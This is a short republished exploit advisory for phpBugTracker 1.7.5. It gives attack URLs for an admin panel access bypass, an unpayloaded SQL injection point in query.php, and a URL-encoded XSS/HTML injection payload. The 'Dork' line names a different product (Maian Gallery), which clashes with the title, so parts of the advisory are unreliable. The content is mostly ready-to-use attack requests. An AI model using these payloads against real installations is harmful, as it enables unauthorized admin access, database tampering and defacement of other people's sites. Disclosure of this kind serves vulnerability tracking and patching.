Home / vulnerabilities

PDF

phpBugTracker 1.7.5 XSS / SQL Injection / Auth Bypass

Posted on 20 May 2015
Source : packetstormsecurity.org Link

 

| # Title : phpBugTracker 1.7.5 Mulllti Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : Maian Gallery v2.0. Copyright © 2006-2015 Maian Script World. All Rights Reserved
| # Tested on: Win 8.1 fr pro / 22:15 * 15/05/2015
| # Bug : Mulllti
| # Download : https://github.com/a-v-k/phpBugTracker
=======================================

By Pass Admin Panel :

http://127.0.0.1/phpBugTracker/admin/configure.php

SQL injection :

http://127.0.0.1/phpBugTracker/query.php?op=doquery&status[]=1 ( inject her )

( XSS / HTML Inject ) :

http://127.0.0.1/phpBugTracker/query.php?op=doquery&status[]=3%27%22%28%29%26%25%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E

 

TOP